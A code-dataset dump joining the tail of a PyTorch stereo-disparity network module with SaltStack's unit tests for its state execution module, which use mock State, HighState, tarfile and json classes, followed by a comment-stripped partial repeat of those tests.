self.conv2 = convbn(planes, planes, kernel_size, 1, pad, dilation)
self.stride = stride
self.downsample = downsample
def forward(self, x):
out = self.conv1(x)
out = self.conv2(out)
if self.downsample is not None:
x = self.downsample(x)
out += x
return out
class matchshifted(nn.Module):
def __init__(self):
super(matchshifted, self).__init__()
def forward(self, left, right, shift):
batch, filters, height, width = left.size()
shifted_left = F.pad(torch.index_select(left, 3, Variable(torch.LongTensor([i for i in range(shift, width)])).cuda()), (shift, 0, 0, 0))
shifted_right = F.pad(torch.index_select(right, 3, Variable(torch.LongTensor([i for i in range(width-shift)])).cuda()), (shift, 0, 0, 0))
out = torch.cat((shifted_left, shifted_right), 1).view(batch, filters*2, 1, height, width)
return out
class disparityregression(nn.Module):
def __init__(self, maxdisp):
super(disparityregression, self).__init__()
self.disp = Variable(torch.Tensor(np.reshape(np.array(range(maxdisp)), [1, maxdisp, 1, 1])).cuda(), requires_grad=False)
def forward(self, x):
disp = self.disp.repeat(x.size()[0], 1, x.size()[2], x.size()[3])
out = torch.sum(x*disp, 1)
return out
class feature_extraction(nn.Module):
def __init__(self):
super(feature_extraction, self).__init__()
self.inplanes = 32
self.layer0 = nn.Sequential(convbn(in_planes=3, out_planes=32, kernel_size=3, stride=1, pad=1, dilation=1),
nn.ReLU(inplace=True)
)
self.layer1 = self._make_layer(block=BasicBlock, planes=32, blocks=3, kernel_size=3, stride=2, pad=1, dilation=1, order=1)
self.layer2 = self._make_layer(BasicBlock, 64, 8, 3, 2, 1, 1, 1)
self.layer3 = self._make_layer(BasicBlock, 128, 3, 3, 2, 1, 1, 2)
self.layer1_after = nn.Sequential(convbn(32, 32, 3, 2, 1, 1),
nn.ReLU(inplace=True))
self.layer2_after = nn.Sequential(convbn(32, 64, 3, 2, 1, 1),
nn.ReLU(inplace=True))
self.layer3_after = nn.Sequential(convbn(64, 128, 3, 2, 1, 1),
nn.ReLU(inplace=True))
self.layer1_final = nn.Sequential(convbn(32, 32, 3, 2, 1, 1),
nn.ReLU(inplace=True))
self.dilat1 = nn.Sequential(convbn(128, 32, 3, 1, 1, 32),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True))
self.dilat2 = nn.Sequential(convbn(128, 32, 3, 1, 1, 16),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True))
self.dilat3 = nn.Sequential(convbn(128, 32, 3, 1, 1, 8),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 4),
nn.ReLU(inplace=True))
self.dilat4 = nn.Sequential(convbn(128, 32, 3, 1, 1, 6),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True))
self.branch1 = nn.Sequential(nn.AvgPool2d((64, 64), stride=(64, 64)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch2 = nn.Sequential(nn.AvgPool2d((32, 32), stride=(32, 32)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch3 = nn.Sequential(nn.AvgPool2d((16, 16), stride=(16, 16)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch4 = nn.Sequential(nn.AvgPool2d((8, 8), stride=(8, 8)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.concat_dilate_pool = nn.Sequential(convbn(64, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, kernel_size=1, padding=0, stride=1, bias=False))
self.lastconv = nn.Sequential(convbn(352, 128, 3, 1, 1, 1),
nn.ReLU(inplace=True),
nn.Conv2d(128, 32, kernel_size=1, padding=0, stride=1, bias=False))
def _make_layer(self, block, planes, blocks, kernel_size, stride, pad, dilation, order):
downsample = None
if stride != 1:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes * order, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),)
layers = []
layers.append(block(self.inplanes*order, planes, kernel_size, stride, downsample, pad, dilation))
if blocks != 1:
for i in range(1, blocks):
layers.append(block(planes, planes, kernel_size, 1, None, pad, dilation))
return nn.Sequential(*layers)
def forward(self, x):
out_0 = self.layer0(x)
out_1 = self.layer1(out_0)
out_1_a = self.layer1_after(out_0)
out_1 = out_1 + out_1_a
out_2 = self.layer2(out_1)
out_2_a = self.layer2_after(out_1)
out_2 = out_2 + out_2_a
out_3 = self.layer3(out_2)
out_3_a = self.layer3_after(out_2)
out_3 = out_3 + out_3_a
out_1 = self.layer1_final(out_1)
inPooling = F.upsample(out_3, (out_2.size()[2], out_2.size()[3]), mode='bilinear')
output_dilate1 = self.dilat1(inPooling)
output_dilate2 = self.dilat2(inPooling)
output_dilate3 = self.dilat3(inPooling)
output_dilate4 = self.dilat4(inPooling)
output_branch1 = self.branch1(inPooling)
output_branch1 = F.upsample(output_branch1, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
output_branch2 = self.branch2(inPooling)
output_branch2 = F.upsample(output_branch2, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
output_branch3 = self.branch3(inPooling)
output_branch3 = F.upsample(output_branch3, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
output_branch4 = self.branch4(inPooling)
output_branch4 = F.upsample(output_branch4, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
out_fusion1 = torch.cat((output_dilate1, output_branch1), 1)
out_fusion1 = self.concat_dilate_pool(out_fusion1)
out_fusion2 = torch.cat((output_dilate2, output_branch2), 1)
out_fusion2 = self.concat_dilate_pool(out_fusion2)
out_fusion3 = torch.cat((output_dilate3, output_branch3), 1)
out_fusion3 = self.concat_dilate_pool(out_fusion3)
out_fusion4 = torch.cat((output_dilate4, output_branch4), 1)
out_fusion4 = self.concat_dilate_pool(out_fusion4)
output_feature = torch.cat((out_1, out_2, inPooling, out_fusion1, out_fusion2, out_fusion3, out_fusion4), 1)
output_feature = self.lastconv(output_feature)
return output_feature
| true | true |
f72351f070b50e290e8199d1fb8860afa7776925 | 37,857 | py | Python | tests/unit/modules/test_state.py | yuanbaopapa/salt | c46490c18394799b5ea5d115c4500080cf41ef91 | [
"Apache-2.0"
] | 1 | 2021-08-14T13:48:38.000Z | 2021-08-14T13:48:38.000Z | tests/unit/modules/test_state.py | yuanbaopapa/salt | c46490c18394799b5ea5d115c4500080cf41ef91 | [
"Apache-2.0"
] | 3 | 2015-03-31T14:44:05.000Z | 2015-06-18T19:02:24.000Z | tests/unit/modules/test_state.py | yuanbaopapa/salt | c46490c18394799b5ea5d115c4500080cf41ef91 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Rahul Handay <rahulha@saltstack.com>`
'''
# Import Python libs
from __future__ import absolute_import
import os
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase, skipIf
from tests.support.mock import (
MagicMock,
patch,
mock_open,
NO_MOCK,
NO_MOCK_REASON
)
# Import Salt Libs
import salt.config
import salt.loader
import salt.utils.hashutils
import salt.utils.odict
import salt.utils.platform
import salt.modules.state as state
from salt.exceptions import SaltInvocationError
from salt.ext import six
class MockState(object):
    """Container for test doubles of the ``salt.state`` classes."""

    def __init__(self):
        pass

    class State(object):
        """Double for ``salt.state.State`` with canned return values.

        ``flag`` is a class attribute that individual tests toggle to steer
        the ``verify_*`` methods between success and failure paths.
        """
        flag = None

        def __init__(self,
                     opts,
                     pillar_override=False,
                     pillar_enc=None,
                     initial_pillar=None):
            pass

        def verify_data(self, data):
            """Succeed only when ``flag`` is set."""
            return bool(self.flag)

        @staticmethod
        def call(data):
            """Return the ``list`` builtin as a sentinel result."""
            return list

        @staticmethod
        def call_high(data, orchestration_jid=None):
            """Pretend the high data ran successfully."""
            return True

        @staticmethod
        def call_template_str(data):
            """Pretend the template string ran successfully."""
            return True

        @staticmethod
        def _mod_init(data):
            """Pretend module initialisation succeeded."""
            return True

        def verify_high(self, data):
            """Return True when ``flag`` is set, else the error sentinel -1."""
            return True if self.flag else -1

        @staticmethod
        def compile_high_data(data):
            """Return a single canned low chunk."""
            return [{'__id__': 'ABC'}]

        @staticmethod
        def call_chunk(data, data1, data2):
            """Return a canned chunk result."""
            return {'': 'ABC'}

        @staticmethod
        def call_chunks(data):
            """Pretend all chunks ran successfully."""
            return True

        @staticmethod
        def call_listen(data, ret):
            """Pretend listen requisites were processed."""
            return True

        def requisite_in(self, data):  # pylint: disable=unused-argument
            """Echo the data back with an empty error list."""
            return data, []

    class HighState(object):
        """Double for ``salt.state.HighState`` with canned return values."""
        flag = False
        opts = {'state_top': '',
                'pillar': {}}

        def __init__(self, opts, pillar_override=None, *args, **kwargs):
            self.building_highstate = salt.utils.odict.OrderedDict
            self.state = MockState.State(opts,
                                         pillar_override=pillar_override)

        def render_state(self, sls, saltenv, mods, matches, local=False):
            """Empty render result; error flag mirrors ``flag``."""
            return ({}, True) if self.flag else ({}, False)

        @staticmethod
        def get_top():
            """Return a canned top-file identifier."""
            return '_top'

        def verify_tops(self, data):
            """Errors list: populated when ``flag`` is set, else empty."""
            return ['a', 'b'] if self.flag else []

        @staticmethod
        def top_matches(data):
            """Return canned top-file matches."""
            return ['a', 'b', 'c']

        @staticmethod
        def push_active():
            """Pretend the active-run marker was pushed."""
            return True

        @staticmethod
        def compile_highstate():
            """Return a canned compiled highstate."""
            return 'A'

        @staticmethod
        def compile_state_usage():
            """Return a canned state-usage report."""
            return 'A'

        @staticmethod
        def pop_active():
            """Pretend the active-run marker was popped."""
            return True

        @staticmethod
        def compile_low_chunks():
            """Pretend the low chunks were compiled."""
            return True

        def render_highstate(self, data):
            """Canned highstate; error flag mirrors ``flag``."""
            return (['a', 'b'], True) if self.flag else (['a', 'b'], False)

        @staticmethod
        def call_highstate(exclude, cache, cache_name, force=None,
                           whitelist=None, orchestration_jid=None):
            """Pretend the highstate ran successfully."""
            return True
class MockSerial(object):
    """Container for a test double of the salt payload serializer."""

    def __init__(self):
        pass

    class Serial(object):
        """Serializer double: fixed ``load()`` payload, no-op ``dump()``."""

        def __init__(self, data):
            pass

        @staticmethod
        def load(data):
            """Always deserialize to a fixed mapping."""
            return {'A': 'B'}

        @staticmethod
        def dump(data, data1):
            """Pretend to serialize; report success."""
            return True
class MockTarFile(object):
    """Minimal ``tarfile.TarFile`` double used by the state-package tests."""

    # Fake archive-member path (platform-native separator).
    path = os.sep + 'tmp'

    def __init__(self):
        pass

    @staticmethod
    def open(data, data1):
        """Stand in for ``tarfile.open``; return the class as the handle."""
        return MockTarFile

    @staticmethod
    def getmembers():
        """Expose a single fake member (the class itself)."""
        return [MockTarFile]

    @staticmethod
    def extractall(data):
        """Pretend extraction succeeded."""
        return True

    @staticmethod
    def close():
        """Pretend the archive was closed."""
        return True
class MockJson(object):
    """``json``-module double whose ``load()`` output is switched by ``flag``."""

    # Toggle set by tests to choose which canned payload load() returns.
    flag = None

    def __init__(self):
        pass

    def load(self, data, object_hook=None):
        """Return ``[True]`` when ``flag`` is set, else a fixed request dict."""
        if self.flag:
            return [True]
        return [{'test': ''}]
@skipIf(NO_MOCK, NO_MOCK_REASON)
class StateTestCase(TestCase, LoaderModuleMockMixin):
'''
Test case for salt.modules.state
'''
def setup_loader_modules(self):
utils = salt.loader.utils(
salt.config.DEFAULT_MINION_OPTS,
whitelist=['state']
)
patcher = patch('salt.modules.state.salt.state', MockState())
patcher.start()
self.addCleanup(patcher.stop)
return {
state: {
'__opts__': {
'cachedir': '/D',
'environment': None,
'__cli': 'salt',
},
'__utils__': utils,
},
}
def test_running(self):
'''
Test of checking i fthe state function is already running
'''
self.assertEqual(state.running(True), [])
mock = MagicMock(side_effect=[[{"fun": "state.running", "pid": "4126",
"jid": "20150325123407204096"}], []])
with patch.dict(state.__salt__,
{'saltutil.is_running': mock}
):
self.assertListEqual(state.running(),
['The function "state.running"'
' is running as PID 4126 and '
'was started at 2015, Mar 25 12:34:07.'
'204096 with jid 20150325123407204096'])
self.assertListEqual(state.running(), [])
def test_low(self):
'''
Test of executing a single low data call
'''
mock = MagicMock(side_effect=[False, None, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.low({"state": "pkg", "fun": "installed",
"name": "vi"}))
MockState.State.flag = False
self.assertEqual(state.low({"state": "pkg", "fun": "installed",
"name": "vi"}), list)
MockState.State.flag = True
self.assertTrue(state.low({"state": "pkg", "fun": "installed",
"name": "vi"}))
def test_high(self):
'''
Test for checking the state system
'''
mock = MagicMock(side_effect=[False, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.high({"vim": {"pkg": ["installed"]}}))
mock = MagicMock(return_value={"test": True})
with patch.object(state, '_get_opts', mock):
self.assertTrue(state.high({"vim": {"pkg": ["installed"]}}))
def test_template(self):
'''
Test of executing the information
stored in a template file on the minion
'''
mock = MagicMock(side_effect=[False, None, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.template('/home/salt/salt.sls'))
MockState.HighState.flag = True
self.assertTrue(state.template('/home/salt/salt.sls'))
MockState.HighState.flag = False
self.assertTrue(state.template('/home/salt/salt.sls'))
def test_template_str(self):
'''
Test for Executing the information
stored in a string from an sls template
'''
mock = MagicMock(side_effect=[False, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.template_str('Template String'))
self.assertTrue(state.template_str('Template String'))
def test_apply_(self):
'''
Test to apply states
'''
mock = MagicMock(return_value=True)
with patch.object(state, 'sls', mock):
self.assertTrue(state.apply_(True))
with patch.object(state, 'highstate', mock):
self.assertTrue(state.apply_(None))
def test_list_disabled(self):
'''
Test to list disabled states
'''
mock = MagicMock(return_value=["A", "B", "C"])
with patch.dict(state.__salt__, {'grains.get': mock}):
self.assertListEqual(state.list_disabled(), ["A", "B", "C"])
def test_enable(self):
'''
Test to Enable state function or sls run
'''
mock = MagicMock(return_value=["A", "B"])
with patch.dict(state.__salt__, {'grains.get': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'grains.setval': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'saltutil.refresh_modules':
mock}):
self.assertDictEqual(state.enable("A"),
{'msg': 'Info: A state enabled.',
'res': True})
self.assertDictEqual(state.enable("Z"),
{'msg': 'Info: Z state already '
'enabled.', 'res': True})
def test_disable(self):
'''
Test to disable state run
'''
mock = MagicMock(return_value=["C", "D"])
with patch.dict(state.__salt__, {'grains.get': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'grains.setval': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'saltutil.refresh_modules':
mock}):
self.assertDictEqual(state.disable("C"),
{'msg': 'Info: C state '
'already disabled.',
'res': True})
self.assertDictEqual(state.disable("Z"),
{'msg': 'Info: Z state '
'disabled.', 'res': True})
def test_clear_cache(self):
'''
Test to clear out cached state file
'''
mock = MagicMock(return_value=["A.cache.p", "B.cache.p", "C"])
with patch.object(os, 'listdir', mock):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'isfile', mock):
mock = MagicMock(return_value=True)
with patch.object(os, 'remove', mock):
self.assertEqual(state.clear_cache(),
['A.cache.p',
'B.cache.p'])
def test_single(self):
'''
Test to execute single state function
'''
ret = {'pkg_|-name=vim_|-name=vim_|-installed': list}
mock = MagicMock(side_effect=["A", None, None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.single("pkg.installed",
" name=vim"), "A")
self.assertEqual(state.single("pk", "name=vim"),
"Invalid function passed")
with patch.dict(state.__opts__, {"test": "install"}):
mock = MagicMock(return_value={"test": ""})
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
self.assertRaises(SaltInvocationError,
state.single,
"pkg.installed",
"name=vim",
pillar="A")
MockState.State.flag = True
self.assertTrue(state.single("pkg.installed",
"name=vim"))
MockState.State.flag = False
self.assertDictEqual(state.single("pkg.installed",
"name=vim"), ret)
def test_show_top(self):
'''
Test to return the top data that the minion will use for a highstate
'''
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_top(), "A")
MockState.HighState.flag = True
self.assertListEqual(state.show_top(), ['a', 'b'])
MockState.HighState.flag = False
self.assertListEqual(state.show_top(), ['a', 'b', 'c'])
def test_run_request(self):
'''
Test to Execute the pending state request
'''
mock = MagicMock(side_effect=[{},
{"name": "A"},
{"name": {'mods': "A",
'kwargs': {}}}])
with patch.object(state, 'check_request', mock):
self.assertDictEqual(state.run_request("A"), {})
self.assertDictEqual(state.run_request("A"), {})
mock = MagicMock(return_value=["True"])
with patch.object(state, 'apply_', mock):
mock = MagicMock(return_value="")
with patch.object(os, 'remove', mock):
self.assertListEqual(state.run_request("name"),
["True"])
def test_show_highstate(self):
'''
Test to retrieve the highstate data from the salt master
'''
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_highstate(), "A")
self.assertRaises(SaltInvocationError,
state.show_highstate,
pillar="A")
self.assertEqual(state.show_highstate(), "A")
def test_show_lowstate(self):
'''
Test to list out the low data that will be applied to this minion
'''
mock = MagicMock(side_effect=["A", None])
with patch.object(state, '_check_queue', mock):
self.assertRaises(AssertionError, state.show_lowstate)
self.assertTrue(state.show_lowstate())
def test_show_state_usage(self):
'''
Test to list out the state usage that will be applied to this minion
'''
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_state_usage(), "A")
self.assertRaises(SaltInvocationError,
state.show_state_usage,
pillar="A")
self.assertEqual(state.show_state_usage(), "A")
def test_sls_id(self):
'''
Test to call a single ID from the
named module(s) and handle all requisites
'''
mock = MagicMock(side_effect=["A", None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.sls_id("apache", "http"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(
return_value={'test': True,
'environment': None}
)
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
MockState.State.flag = True
MockState.HighState.flag = True
self.assertEqual(state.sls_id("apache", "http"), 2)
MockState.State.flag = False
self.assertDictEqual(state.sls_id("ABC", "http"),
{'': 'ABC'})
self.assertRaises(SaltInvocationError,
state.sls_id,
"DEF", "http")
def test_show_low_sls(self):
'''
Test to display the low data from a specific sls
'''
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_low_sls("foo"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(
return_value={'test': True,
'environment': None}
)
with patch.object(state, '_get_opts', mock):
MockState.State.flag = True
MockState.HighState.flag = True
self.assertEqual(state.show_low_sls("foo"), 2)
MockState.State.flag = False
self.assertListEqual(state.show_low_sls("foo"),
[{'__id__': 'ABC'}])
def test_show_sls(self):
'''
Test to display the state data from a specific sls
'''
mock = MagicMock(side_effect=["A", None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_sls("foo"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(
return_value={'test': True,
'environment': None}
)
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
self.assertRaises(SaltInvocationError,
state.show_sls,
"foo",
pillar="A")
MockState.State.flag = True
self.assertEqual(state.show_sls("foo"), 2)
MockState.State.flag = False
self.assertListEqual(state.show_sls("foo"),
['a', 'b'])
def test_top(self):
'''
Test to execute a specific top file
'''
ret = ['Pillar failed to render with the following messages:', 'E']
mock = MagicMock(side_effect=["A", None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.top("reverse_top.sls"), "A")
mock = MagicMock(side_effect=[False, True, True])
with patch.object(state, '_check_pillar', mock):
with patch.dict(state.__pillar__, {"_errors": "E"}):
self.assertListEqual(state.top("reverse_top.sls"), ret)
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(return_value={'test': True})
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
self.assertRaises(SaltInvocationError,
state.top,
"reverse_top.sls",
pillar="A")
mock = MagicMock(
return_value
=
'salt://reverse_top.sls')
with patch.object(os.path, 'join', mock):
mock = MagicMock(return_value=True)
with patch.object(state, '_set_retcode',
mock):
self.assertTrue(
state.
top("reverse_top.sls "
"exclude=exclude.sls"))
    def test_highstate(self):
        '''
        Test to retrieve the state data from the
        salt master for the minion and execute it
        '''
        arg = "whitelist=sls1.sls"
        # First call: highstate is disabled, so the "Disabled" document is
        # returned; the remaining False values let later calls proceed.
        mock = MagicMock(side_effect=[True, False, False, False])
        with patch.object(state, '_disabled', mock):
            self.assertDictEqual(state.highstate("whitelist=sls1.sls"),
                                 {'comment': 'Disabled',
                                  'name': 'Salt highstate run is disabled. '
                                  'To re-enable, run state.enable highstate',
                                  'result': 'False'})
            # A queued message ("A") is passed straight through.
            mock = MagicMock(side_effect=["A", None, None])
            with patch.object(state, '_check_queue', mock):
                self.assertEqual(state.highstate("whitelist=sls1.sls"), "A")
                with patch.dict(state.__opts__, {"test": "A"}):
                    mock = MagicMock(return_value={'test': True})
                    with patch.object(state, '_get_opts', mock):
                        # A non-dict pillar must be rejected.
                        self.assertRaises(SaltInvocationError,
                                          state.highstate,
                                          "whitelist=sls1.sls",
                                          pillar="A")
                        mock = MagicMock(return_value=True)
                        with patch.dict(state.__salt__,
                                        {'config.option': mock}):
                            mock = MagicMock(return_value="A")
                            with patch.object(state, '_filter_running',
                                              mock):
                                mock = MagicMock(return_value=True)
                                with patch.object(state, '_filter_running',
                                                  mock):
                                    mock = MagicMock(return_value=True)
                                    # With serialization, path joining and
                                    # retcode handling mocked out, a full
                                    # highstate run reports success.
                                    with patch.object(salt.payload, 'Serial',
                                                      mock):
                                        with patch.object(os.path,
                                                          'join', mock):
                                            with patch.object(
                                                state,
                                                '_set'
                                                '_retcode',
                                                mock):
                                                self.assertTrue(state.
                                                                highstate
                                                                (arg))
def test_clear_request(self):
'''
Test to clear out the state execution request without executing it
'''
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.payload, 'Serial', mock):
mock = MagicMock(side_effect=[False, True, True])
with patch.object(os.path, 'isfile', mock):
self.assertTrue(state.clear_request("A"))
mock = MagicMock(return_value=True)
with patch.object(os, 'remove', mock):
self.assertTrue(state.clear_request())
mock = MagicMock(return_value={})
with patch.object(state, 'check_request', mock):
self.assertFalse(state.clear_request("A"))
def test_check_request(self):
'''
Test to return the state request information
'''
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock), \
patch('salt.modules.state.salt.payload', MockSerial):
mock = MagicMock(side_effect=[True, True, False])
with patch.object(os.path, 'isfile', mock):
with patch('salt.utils.files.fopen', mock_open()):
self.assertDictEqual(state.check_request(), {'A': 'B'})
with patch('salt.utils.files.fopen', mock_open()):
self.assertEqual(state.check_request("A"), 'B')
self.assertDictEqual(state.check_request(), {})
    def test_request(self):
        '''
        Test to request the local admin execute a state run
        '''
        mock = MagicMock(return_value=True)
        with patch.object(state, 'apply_', mock):
            mock = MagicMock(return_value=True)
            with patch.object(os.path, 'join', mock):
                # check_request is mocked to return an existing request
                # record that the new request is stored alongside.
                mock = MagicMock(return_value=
                                 {"test_run": "",
                                  "mods": "",
                                  "kwargs": ""})
                with patch.object(state, 'check_request', mock):
                    mock = MagicMock(return_value=True)
                    with patch.object(os, 'umask', mock):
                        # is_windows returns True here, so the
                        # Windows-specific branch (cmd.run) is exercised.
                        with patch.object(salt.utils.platform, 'is_windows', mock):
                            with patch.dict(state.__salt__, {'cmd.run': mock}):
                                with patch('salt.utils.files.fopen', mock_open()):
                                    mock = MagicMock(return_value=True)
                                    with patch.object(os, 'umask', mock):
                                        self.assertTrue(state.request("A"))
    def test_sls(self):
        '''
        Test to execute a set list of state files from an environment
        '''
        arg = "core,edit.vim dev"
        ret = ['Pillar failed to render with the following messages:', 'E', '1']
        mock = MagicMock(return_value=True)
        # A conflicting run already in progress: sls returns the running
        # info and the retcode stays set in the context.
        with patch.object(state, 'running', mock):
            with patch.dict(state.__context__, {"retcode": 1}):
                self.assertEqual(state.sls("core,edit.vim dev"), True)
        mock = MagicMock(side_effect=[True, True, True, True, True, True])
        with patch.object(state, '_wait', mock):
            # First call: one of the requested mods is disabled ("A").
            mock = MagicMock(side_effect=[["A"], [], [], [], [], []])
            with patch.object(state, '_disabled', mock):
                with patch.dict(state.__context__, {"retcode": 1}):
                    self.assertEqual(
                        state.sls("core,edit.vim dev",
                                  None,
                                  None,
                                  True),
                        ["A"])
                mock = MagicMock(side_effect=[False,
                                              True,
                                              True,
                                              True,
                                              True])
                with patch.object(state, '_check_pillar', mock):
                    # Failed pillar check: the pillar errors are returned.
                    with patch.dict(state.__context__, {"retcode": 5}):
                        with patch.dict(state.__pillar__, {"_errors": "E1"}):
                            self.assertListEqual(state.sls("core,edit.vim dev",
                                                           None,
                                                           None,
                                                           True), ret)
                    with patch.dict(state.__opts__, {"test": None}):
                        mock = MagicMock(return_value={"test": "",
                                                       "environment": None})
                        with patch.object(state, '_get_opts', mock):
                            mock = MagicMock(return_value=True)
                            with patch.object(salt.utils,
                                              'test_mode',
                                              mock):
                                # A non-dict pillar must be rejected.
                                self.assertRaises(
                                    SaltInvocationError,
                                    state.sls,
                                    "core,edit.vim dev",
                                    None,
                                    None,
                                    True,
                                    pillar="A")
                                mock = MagicMock(return_value="/D/cache.cache.p")
                                with patch.object(os.path,
                                                  'join',
                                                  mock):
                                    mock = MagicMock(return_value=True)
                                    with patch.object(os.path,
                                                      'isfile',
                                                      mock):
                                        # cache=True: the cached low chunks
                                        # file is read back and executed.
                                        with patch(
                                            'salt.utils.files.fopen',
                                            mock_open()):
                                            self.assertTrue(
                                                state.sls(arg,
                                                          None,
                                                          None,
                                                          True,
                                                          cache
                                                          =True
                                                          )
                                            )
                                    # HighState.flag True: render_state
                                    # reports errors, which sls returns.
                                    MockState.HighState.flag = True
                                    self.assertTrue(state.sls("core,edit"
                                                              ".vim dev",
                                                              None,
                                                              None,
                                                              True)
                                                    )
                                    MockState.HighState.flag = False
                                    mock = MagicMock(return_value=True)
                                    with patch.dict(state.__salt__,
                                                    {'config.option':
                                                     mock}):
                                        mock = MagicMock(return_value=
                                                         True)
                                        with patch.object(
                                            state,
                                            '_filter_'
                                            'running',
                                            mock):
                                            # Remainder of the happy path is
                                            # continued in sub_test_sls.
                                            self.sub_test_sls()
def sub_test_sls(self):
'''
Sub function of test_sls
'''
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock):
with patch.object(os, 'umask', mock):
mock = MagicMock(return_value=False)
with patch.object(salt.utils.platform, 'is_windows', mock):
mock = MagicMock(return_value=True)
with patch.object(os, 'umask', mock):
with patch.object(state, '_set_retcode', mock):
with patch.dict(state.__opts__,
{"test": True}):
with patch('salt.utils.files.fopen', mock_open()):
self.assertTrue(state.sls("core,edit"
".vim dev",
None,
None,
True))
    def test_pkg(self):
        '''
        Test to execute a packaged state run
        '''
        tar_file = os.sep + os.path.join('tmp', 'state_pkg.tgz')
        # First isfile call is False (missing package); all later calls
        # find the file.
        mock = MagicMock(side_effect=[False, True, True, True, True, True, True, True])
        with patch.object(os.path, 'isfile', mock), \
                patch('salt.modules.state.tarfile', MockTarFile), \
                patch('salt.modules.state.json', MockJson()):
            # Missing package file: nothing to run.
            self.assertEqual(state.pkg(tar_file, "", "md5"), {})
            mock = MagicMock(side_effect=[False, 0, 0, 0, 0])
            with patch.object(salt.utils.hashutils, 'get_hash', mock):
                # Verify hash
                self.assertDictEqual(state.pkg(tar_file, "", "md5"), {})
                # Verify file outside intended root
                self.assertDictEqual(state.pkg(tar_file, 0, "md5"), {})
                # MockJson.flag True makes the fake json loader return
                # [True], which pkg passes through as errors.
                MockTarFile.path = ""
                MockJson.flag = True
                with patch('salt.utils.files.fopen', mock_open()):
                    self.assertListEqual(state.pkg(tar_file, 0, "md5"), [True])
                MockTarFile.path = ""
                MockJson.flag = False
                if six.PY2:
                    with patch('salt.utils.files.fopen', mock_open()), \
                            patch.dict(state.__utils__, {'state.check_result': MagicMock(return_value=True)}):
                        self.assertTrue(state.pkg(tar_file, 0, "md5"))
                else:
                    with patch('salt.utils.files.fopen', mock_open()):
                        self.assertTrue(state.pkg(tar_file, 0, "md5"))
| 38.009036 | 110 | 0.425179 |
from __future__ import absolute_import
import os
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase, skipIf
from tests.support.mock import (
MagicMock,
patch,
mock_open,
NO_MOCK,
NO_MOCK_REASON
)
import salt.config
import salt.loader
import salt.utils.hashutils
import salt.utils.odict
import salt.utils.platform
import salt.modules.state as state
from salt.exceptions import SaltInvocationError
from salt.ext import six
class MockState(object):
    '''
    Container of fake ``State`` and ``HighState`` classes patched in
    place of ``salt.state`` for the duration of each test.
    '''
    def __init__(self):
        pass
    class State(object):
        '''
        Fake ``salt.state.State``: returns canned values; ``flag``
        steers the verify_* results.
        '''
        # Class-level switch toggled by tests to make verification
        # succeed or fail.
        flag = None
        def __init__(self,
                     opts,
                     pillar_override=False,
                     pillar_enc=None,
                     initial_pillar=None):
            pass
        def verify_data(self, data):
            # Succeeds only while the test has set ``flag``.
            data = data
            if self.flag:
                return True
            else:
                return False
        @staticmethod
        def call(data):
            # Returns the ``list`` builtin as a recognizable sentinel.
            data = data
            return list
        @staticmethod
        def call_high(data, orchestration_jid=None):
            data = data
            return True
        @staticmethod
        def call_template_str(data):
            data = data
            return True
        @staticmethod
        def _mod_init(data):
            data = data
            return True
